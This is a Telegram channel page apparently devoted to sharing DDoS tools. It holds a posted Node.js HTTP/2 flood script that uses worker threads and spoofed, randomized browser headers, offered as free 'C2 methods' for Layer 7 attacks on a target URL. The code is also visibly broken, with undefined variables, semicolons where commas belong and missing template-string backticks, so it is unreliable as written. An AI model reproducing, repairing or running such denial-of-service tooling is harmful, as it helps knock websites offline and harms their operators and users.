LEAKING TOOLS DDOS | Layer 4 Layer 7
Open in Telegram
LeakingToolsDddos Comunity Founder : @ItsXyro Staff : Need -3 Partner : Need -5
Show more233
Subscribers
No data24 hours
No data7 days
+9830 days
Posts Archive
const http2 = require('http2');
const gene = require ('header-generator');
const { Worker, isMainThread, workerData } = require('worker_threads');
function sendRequest(url, port, headers) {
const client = http2.connect(https://${url}:${port});
const req = client.request({
':path': '/',
...headers,
});
req.setEncoding('utf8');
req.on('response', (headers, flags) => {
console.log(Response received: ${JSON.stringify(headers)});
client.close();
});
req.end();
}
if (isMainThread) {
const url = process.argv[2] || 'example.com';
const port = process.argv[3] || 443;
const threads = parseInt(process.argv[4]) || 1;
const time = parseInt(process.argv[5]) || 5000;
const headers = {
'method' : 'GET',
'Accept-Language' : 'en-US,en;q=0.9',
'cache-control' : randomHeaders['cache-control'];
'accept-encoding' : randomHeaders['accept-encoding'];
'Pragma' : "akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id,akamai-x-get-nonces,akamai-x-get-client-ip,akamai-x-feo-trace";
'sec-ch-ua-platform' : randomHeaders['sec-ch-ua-platform'];
'upgrade-insecure-requests' : "1";
'sec-fetch-dest' : randomHeaders['sec-fetch-dest'];
'sec-fetch-mode' : randomHeaders['sec-fetch-mode'];
'sec-fetch-site' : randomHeaders['sec-fetch-site'];
'X-Forwarded-Proto' : HTTPS;
'sec-ch-ua' : randomHeaders['sec-ch-ua'];
'sec-ch-ua-mobile' : randomHeaders['sec-ch-ua-mobile'];
'sec-ch-ua-platform' : randomHeaders['sec-ch-ua-platform'];
'vary' : randomHeaders['vary'];
'x-requested-with' : "XMLHttpRequest";
}; // Add your custom headers here
for (let i = 0; i < threads; i++) {
new Worker(__filename, {
workerData: { url, port, headers },
});
}
setTimeout(() => process.exit(0), time);
} else {
const { url, port, headers } = workerData;
sendRequest(url, port, headers);
}
Free Methods
I haven't tested it yet🗿
Its Obito C2 Methods I only fixed the header
if you get an error in my chat @kyoura01
